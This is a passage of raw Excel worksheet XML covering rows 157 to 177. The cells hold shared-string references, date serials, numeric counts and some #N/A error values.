      <c r="L157" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M157" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N157" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O157" s="1" t="s">
        <v>2973</v>
      </c>
      <c r="P157" s="1" t="s">
        <v>250</v>
      </c>
      <c r="Q157" s="1" t="s">
        <v>3672</v>
      </c>
      <c r="R157" s="82">
        <v>4088</v>
      </c>
      <c r="S157" s="82">
        <v>2553</v>
      </c>
      <c r="T157" s="82">
        <v>10750</v>
      </c>
      <c r="U157" s="82">
        <v>5247</v>
      </c>
      <c r="V157" s="82">
        <v>4679</v>
      </c>
      <c r="W157" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="158" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A158" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B158" s="51">
        <v>43764.136447372686</v>
      </c>
      <c r="C158" s="1" t="s">
        <v>3199</v>
      </c>
      <c r="D158" s="26">
        <v>173</v>
      </c>
      <c r="E158" s="1" t="s">
        <v>3200</v>
      </c>
      <c r="F158" s="26">
        <v>110</v>
      </c>
      <c r="G158" s="57" t="s">
        <v>3201</v>
      </c>
      <c r="H158" s="1" t="s">
        <v>2972</v>
      </c>
      <c r="I158" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J158" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K158" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L158" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M158" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N158" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O158" s="1" t="s">
        <v>2973</v>
      </c>
      <c r="P158" s="1"/>
      <c r="Q158" s="1" t="s">
        <v>3673</v>
      </c>
      <c r="R158" s="82">
        <v>4088</v>
      </c>
      <c r="S158" s="82">
        <v>2553</v>
      </c>
      <c r="T158" s="82">
        <v>10750</v>
      </c>
      <c r="U158" s="82">
        <v>5247</v>
      </c>
      <c r="V158" s="82">
        <v>4679</v>
      </c>
      <c r="W158" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="159" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A159" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B159" s="51">
        <v>44019.157665162034</v>
      </c>
      <c r="C159" s="1" t="s">
        <v>3204</v>
      </c>
      <c r="D159" s="26">
        <v>102</v>
      </c>
      <c r="E159" s="1" t="s">
        <v>3205</v>
      </c>
      <c r="F159" s="26">
        <v>102</v>
      </c>
      <c r="G159" s="57" t="s">
        <v>3206</v>
      </c>
      <c r="H159" s="1" t="s">
        <v>3207</v>
      </c>
      <c r="I159" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J159" s="1" t="s">
        <v>542</v>
      </c>
      <c r="K159" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L159" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M159" s="35"/>
      <c r="N159" s="1" t="s">
        <v>3208</v>
      </c>
      <c r="O159" s="1" t="s">
        <v>3209</v>
      </c>
      <c r="P159" s="1" t="s">
        <v>1812</v>
      </c>
      <c r="Q159" s="1" t="s">
        <v>3674</v>
      </c>
      <c r="R159" s="82">
        <v>208181</v>
      </c>
      <c r="S159" s="82">
        <v>143732</v>
      </c>
      <c r="T159" s="82">
        <v>942430</v>
      </c>
      <c r="U159" s="82">
        <v>1754325</v>
      </c>
      <c r="V159" s="82">
        <v>1853012</v>
      </c>
      <c r="W159" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="160" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A160" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B160" s="51">
        <v>44155.753830057867</v>
      </c>
      <c r="C160" s="1" t="s">
        <v>3103</v>
      </c>
      <c r="D160" s="26">
        <v>102</v>
      </c>
      <c r="E160" s="1" t="s">
        <v>3211</v>
      </c>
      <c r="F160" s="26">
        <v>102</v>
      </c>
      <c r="G160" s="57" t="s">
        <v>3212</v>
      </c>
      <c r="H160" s="1" t="s">
        <v>2723</v>
      </c>
      <c r="I160" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J160" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K160" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L160" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M160" s="1" t="s">
        <v>2703</v>
      </c>
      <c r="N160" s="1"/>
      <c r="O160" s="1"/>
      <c r="P160" s="1"/>
      <c r="Q160" s="1" t="s">
        <v>3107</v>
      </c>
      <c r="R160" s="82">
        <v>68114</v>
      </c>
      <c r="S160" s="82">
        <v>53184</v>
      </c>
      <c r="T160" s="82">
        <v>360742</v>
      </c>
      <c r="U160" s="82">
        <v>579398</v>
      </c>
      <c r="V160" s="82">
        <v>725758</v>
      </c>
      <c r="W160" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="161" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A161" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B161" s="51">
        <v>44130.739603888891</v>
      </c>
      <c r="C161" s="1" t="s">
        <v>3213</v>
      </c>
      <c r="D161" s="26">
        <v>112</v>
      </c>
      <c r="E161" s="1" t="s">
        <v>3214</v>
      </c>
      <c r="F161" s="26">
        <v>102</v>
      </c>
      <c r="G161" s="57" t="s">
        <v>3215</v>
      </c>
      <c r="H161" s="1" t="s">
        <v>3216</v>
      </c>
      <c r="I161" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J161" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K161" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L161" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M161" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N161" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O161" s="1"/>
      <c r="P161" s="1"/>
      <c r="Q161" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R161" s="82">
        <v>1</v>
      </c>
      <c r="S161" s="82">
        <v>1</v>
      </c>
      <c r="T161" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U161" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V161" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W161" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="162" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A162" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B162" s="51">
        <v>44145.612867685188</v>
      </c>
      <c r="C162" s="1" t="s">
        <v>3217</v>
      </c>
      <c r="D162" s="26">
        <v>122</v>
      </c>
      <c r="E162" s="1" t="s">
        <v>3218</v>
      </c>
      <c r="F162" s="26">
        <v>102</v>
      </c>
      <c r="G162" s="57" t="s">
        <v>3219</v>
      </c>
      <c r="H162" s="1" t="s">
        <v>3220</v>
      </c>
      <c r="I162" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J162" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K162" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L162" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M162" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N162" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O162" s="1"/>
      <c r="P162" s="1"/>
      <c r="Q162" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R162" s="82">
        <v>116</v>
      </c>
      <c r="S162" s="82">
        <v>128</v>
      </c>
      <c r="T162" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U162" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V162" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W162" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="163" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A163" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B163" s="51">
        <v>43977.603855960646</v>
      </c>
      <c r="C163" s="1" t="s">
        <v>3217</v>
      </c>
      <c r="D163" s="26">
        <v>122</v>
      </c>
      <c r="E163" s="1" t="s">
        <v>3221</v>
      </c>
      <c r="F163" s="26">
        <v>101</v>
      </c>
      <c r="G163" s="57" t="s">
        <v>3222</v>
      </c>
      <c r="H163" s="1" t="s">
        <v>3223</v>
      </c>
      <c r="I163" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J163" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K163" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L163" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M163" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N163" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O163" s="1"/>
      <c r="P163" s="1"/>
      <c r="Q163" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R163" s="82">
        <v>14</v>
      </c>
      <c r="S163" s="82">
        <v>10</v>
      </c>
      <c r="T163" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U163" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V163" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W163" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="164" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A164" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B164" s="51">
        <v>43977.603855983798</v>
      </c>
      <c r="C164" s="1" t="s">
        <v>3217</v>
      </c>
      <c r="D164" s="26">
        <v>122</v>
      </c>
      <c r="E164" s="1" t="s">
        <v>3224</v>
      </c>
      <c r="F164" s="26">
        <v>101</v>
      </c>
      <c r="G164" s="57" t="s">
        <v>3225</v>
      </c>
      <c r="H164" s="1" t="s">
        <v>3226</v>
      </c>
      <c r="I164" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J164" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K164" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L164" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M164" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N164" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O164" s="1"/>
      <c r="P164" s="1"/>
      <c r="Q164" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R164" s="82">
        <v>112</v>
      </c>
      <c r="S164" s="82">
        <v>128</v>
      </c>
      <c r="T164" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U164" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V164" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W164" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="165" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A165" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B165" s="51">
        <v>44145.612867743053</v>
      </c>
      <c r="C165" s="1" t="s">
        <v>3217</v>
      </c>
      <c r="D165" s="26">
        <v>122</v>
      </c>
      <c r="E165" s="1" t="s">
        <v>3227</v>
      </c>
      <c r="F165" s="26">
        <v>103</v>
      </c>
      <c r="G165" s="57" t="s">
        <v>3228</v>
      </c>
      <c r="H165" s="1" t="s">
        <v>3229</v>
      </c>
      <c r="I165" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J165" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K165" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L165" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M165" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N165" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O165" s="1"/>
      <c r="P165" s="1"/>
      <c r="Q165" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R165" s="82">
        <v>49</v>
      </c>
      <c r="S165" s="82">
        <v>39</v>
      </c>
      <c r="T165" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U165" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V165" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W165" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="166" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A166" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B166" s="51">
        <v>43977.603856006943</v>
      </c>
      <c r="C166" s="1" t="s">
        <v>3217</v>
      </c>
      <c r="D166" s="26">
        <v>122</v>
      </c>
      <c r="E166" s="1" t="s">
        <v>3230</v>
      </c>
      <c r="F166" s="26">
        <v>100</v>
      </c>
      <c r="G166" s="57" t="s">
        <v>3231</v>
      </c>
      <c r="H166" s="1" t="s">
        <v>3232</v>
      </c>
      <c r="I166" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J166" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K166" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L166" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M166" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N166" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O166" s="1"/>
      <c r="P166" s="1"/>
      <c r="Q166" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R166" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S166" s="82">
        <v>1</v>
      </c>
      <c r="T166" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U166" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V166" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W166" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="167" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A167" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B167" s="51">
        <v>44132.612051087963</v>
      </c>
      <c r="C167" s="1" t="s">
        <v>3233</v>
      </c>
      <c r="D167" s="26">
        <v>144</v>
      </c>
      <c r="E167" s="1" t="s">
        <v>3234</v>
      </c>
      <c r="F167" s="26">
        <v>102</v>
      </c>
      <c r="G167" s="57" t="s">
        <v>3235</v>
      </c>
      <c r="H167" s="1" t="s">
        <v>3236</v>
      </c>
      <c r="I167" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J167" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K167" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L167" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M167" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N167" s="1"/>
      <c r="O167" s="1" t="s">
        <v>3237</v>
      </c>
      <c r="P167" s="1" t="s">
        <v>951</v>
      </c>
      <c r="Q167" s="1" t="s">
        <v>3675</v>
      </c>
      <c r="R167" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S167" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T167" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U167" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V167" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W167" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="168" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A168" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B168" s="51">
        <v>44123.591835520834</v>
      </c>
      <c r="C168" s="1" t="s">
        <v>3233</v>
      </c>
      <c r="D168" s="26">
        <v>144</v>
      </c>
      <c r="E168" s="1" t="s">
        <v>3239</v>
      </c>
      <c r="F168" s="26">
        <v>101</v>
      </c>
      <c r="G168" s="57" t="s">
        <v>3240</v>
      </c>
      <c r="H168" s="1" t="s">
        <v>412</v>
      </c>
      <c r="I168" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J168" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K168" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L168" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M168" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N168" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O168" s="1"/>
      <c r="P168" s="1"/>
      <c r="Q168" s="1" t="s">
        <v>3675</v>
      </c>
      <c r="R168" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S168" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T168" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U168" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V168" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W168" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="169" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A169" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B169" s="51">
        <v>44139.372962187503</v>
      </c>
      <c r="C169" s="1" t="s">
        <v>3233</v>
      </c>
      <c r="D169" s="26">
        <v>144</v>
      </c>
      <c r="E169" s="1" t="s">
        <v>3241</v>
      </c>
      <c r="F169" s="26">
        <v>102</v>
      </c>
      <c r="G169" s="57" t="s">
        <v>3242</v>
      </c>
      <c r="H169" s="1" t="s">
        <v>416</v>
      </c>
      <c r="I169" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J169" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K169" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L169" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M169" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N169" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O169" s="1"/>
      <c r="P169" s="1"/>
      <c r="Q169" s="1" t="s">
        <v>3675</v>
      </c>
      <c r="R169" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S169" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T169" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U169" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V169" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W169" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="170" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A170" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B170" s="51">
        <v>44132.612051122684</v>
      </c>
      <c r="C170" s="1" t="s">
        <v>3233</v>
      </c>
      <c r="D170" s="26">
        <v>144</v>
      </c>
      <c r="E170" s="1" t="s">
        <v>3243</v>
      </c>
      <c r="F170" s="26">
        <v>101</v>
      </c>
      <c r="G170" s="57" t="s">
        <v>3244</v>
      </c>
      <c r="H170" s="1" t="s">
        <v>419</v>
      </c>
      <c r="I170" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J170" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K170" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L170" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M170" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N170" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O170" s="1"/>
      <c r="P170" s="1"/>
      <c r="Q170" s="1" t="s">
        <v>3675</v>
      </c>
      <c r="R170" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S170" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T170" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U170" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V170" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W170" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="171" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A171" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B171" s="51">
        <v>44126.700148321761</v>
      </c>
      <c r="C171" s="1" t="s">
        <v>3233</v>
      </c>
      <c r="D171" s="26">
        <v>144</v>
      </c>
      <c r="E171" s="1" t="s">
        <v>3245</v>
      </c>
      <c r="F171" s="26">
        <v>101</v>
      </c>
      <c r="G171" s="57" t="s">
        <v>3246</v>
      </c>
      <c r="H171" s="1" t="s">
        <v>422</v>
      </c>
      <c r="I171" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J171" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K171" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L171" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M171" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N171" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O171" s="1"/>
      <c r="P171" s="1"/>
      <c r="Q171" s="1" t="s">
        <v>3675</v>
      </c>
      <c r="R171" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S171" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T171" s="82">
        <v>5271</v>
      </c>
      <c r="U171" s="82">
        <v>7652</v>
      </c>
      <c r="V171" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W171" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="172" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A172" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B172" s="51">
        <v>44123.591835578707</v>
      </c>
      <c r="C172" s="1" t="s">
        <v>3233</v>
      </c>
      <c r="D172" s="26">
        <v>144</v>
      </c>
      <c r="E172" s="1" t="s">
        <v>3247</v>
      </c>
      <c r="F172" s="26">
        <v>101</v>
      </c>
      <c r="G172" s="57" t="s">
        <v>3248</v>
      </c>
      <c r="H172" s="1" t="s">
        <v>426</v>
      </c>
      <c r="I172" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J172" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K172" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L172" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M172" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N172" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O172" s="1"/>
      <c r="P172" s="1"/>
      <c r="Q172" s="1" t="s">
        <v>3675</v>
      </c>
      <c r="R172" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S172" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T172" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U172" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V172" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W172" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="173" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A173" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B173" s="51">
        <v>44139.372962199071</v>
      </c>
      <c r="C173" s="1" t="s">
        <v>3233</v>
      </c>
      <c r="D173" s="26">
        <v>144</v>
      </c>
      <c r="E173" s="1" t="s">
        <v>3249</v>
      </c>
      <c r="F173" s="26">
        <v>102</v>
      </c>
      <c r="G173" s="57" t="s">
        <v>3250</v>
      </c>
      <c r="H173" s="1" t="s">
        <v>430</v>
      </c>
      <c r="I173" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J173" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K173" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L173" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M173" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N173" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O173" s="1"/>
      <c r="P173" s="1"/>
      <c r="Q173" s="1" t="s">
        <v>3675</v>
      </c>
      <c r="R173" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S173" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T173" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U173" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V173" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W173" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="174" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A174" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B174" s="51">
        <v>44123.591835555555</v>
      </c>
      <c r="C174" s="1" t="s">
        <v>3233</v>
      </c>
      <c r="D174" s="26">
        <v>144</v>
      </c>
      <c r="E174" s="1" t="s">
        <v>3251</v>
      </c>
      <c r="F174" s="26">
        <v>101</v>
      </c>
      <c r="G174" s="57" t="s">
        <v>3252</v>
      </c>
      <c r="H174" s="1" t="s">
        <v>433</v>
      </c>
      <c r="I174" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J174" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K174" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L174" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M174" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N174" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O174" s="1"/>
      <c r="P174" s="1"/>
      <c r="Q174" s="1" t="s">
        <v>3675</v>
      </c>
      <c r="R174" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S174" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T174" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U174" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V174" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W174" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="175" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A175" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B175" s="51">
        <v>43907.411483553238</v>
      </c>
      <c r="C175" s="1" t="s">
        <v>3253</v>
      </c>
      <c r="D175" s="26">
        <v>101</v>
      </c>
      <c r="E175" s="1" t="s">
        <v>3254</v>
      </c>
      <c r="F175" s="26">
        <v>101</v>
      </c>
      <c r="G175" s="57" t="s">
        <v>3255</v>
      </c>
      <c r="H175" s="1" t="s">
        <v>527</v>
      </c>
      <c r="I175" s="1" t="s">
        <v>528</v>
      </c>
      <c r="J175" s="1" t="s">
        <v>529</v>
      </c>
      <c r="K175" s="1" t="s">
        <v>39</v>
      </c>
      <c r="L175" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M175" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N175" s="1"/>
      <c r="O175" s="1"/>
      <c r="P175" s="1"/>
      <c r="Q175" s="1" t="s">
        <v>3676</v>
      </c>
      <c r="R175" s="82">
        <v>182495</v>
      </c>
      <c r="S175" s="82">
        <v>125921</v>
      </c>
      <c r="T175" s="82">
        <v>730283</v>
      </c>
      <c r="U175" s="82">
        <v>1167112</v>
      </c>
      <c r="V175" s="82">
        <v>1166640</v>
      </c>
      <c r="W175" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="176" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A176" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B176" s="51">
        <v>44095.585860370367</v>
      </c>
      <c r="C176" s="1" t="s">
        <v>3253</v>
      </c>
      <c r="D176" s="26">
        <v>200</v>
      </c>
      <c r="E176" s="1" t="s">
        <v>3254</v>
      </c>
      <c r="F176" s="26">
        <v>200</v>
      </c>
      <c r="G176" s="57" t="s">
        <v>3255</v>
      </c>
      <c r="H176" s="1" t="s">
        <v>527</v>
      </c>
      <c r="I176" s="1" t="s">
        <v>528</v>
      </c>
      <c r="J176" s="1" t="s">
        <v>529</v>
      </c>
      <c r="K176" s="1" t="s">
        <v>39</v>
      </c>
      <c r="L176" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M176" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N176" s="1"/>
      <c r="O176" s="1"/>
      <c r="P176" s="1" t="s">
        <v>530</v>
      </c>
      <c r="Q176" s="1" t="s">
        <v>3677</v>
      </c>
      <c r="R176" s="82">
        <v>2672</v>
      </c>
      <c r="S176" s="82">
        <v>3942</v>
      </c>
      <c r="T176" s="82">
        <v>11224</v>
      </c>
      <c r="U176" s="82">
        <v>23126</v>
      </c>
      <c r="V176" s="82">
        <v>16913</v>
      </c>
      <c r="W176" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="177" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A177" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B177" s="51">
        <v>44159.674185833333</v>
      </c>
      <c r="C177" s="1" t="s">
        <v>3097</v>
      </c>
      <c r="D177" s="26">
        <v>160</v>
      </c>
      <c r="E177" s="1" t="s">
        <v>3258</v>
      </c>
      <c r="F177" s="26">
        <v>140</v>
      </c>
      <c r="G177" s="57" t="s">
        <v>3259</v>
      </c>
      <c r="H177" s="1" t="s">
        <v>3100</v>
      </c>
      <c r="I177" s="1" t="s">
        <v>203</v>
      </c>
      <c r="J177" s="1" t="s">
        <v>3101</v>
      </c>
      <c r="K177" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L177" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M177" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N177" s="1"/>
      <c r="O177" s="1"/>
      <c r="P177" s="1"/>
      <c r="Q177" s="1" t="s">
        <v>3661</v>
      </c>
      <c r="R177" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S177" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T177" s="82">
        <v>1635</v>
      </c>
      <c r="U177" s="82">
        <v>2540</v>
      </c>
      <c r="V177" s="82">
        <v>1541</v>
      </c>
      <c r="W177" s="1" t="s">
        <v>208</v>
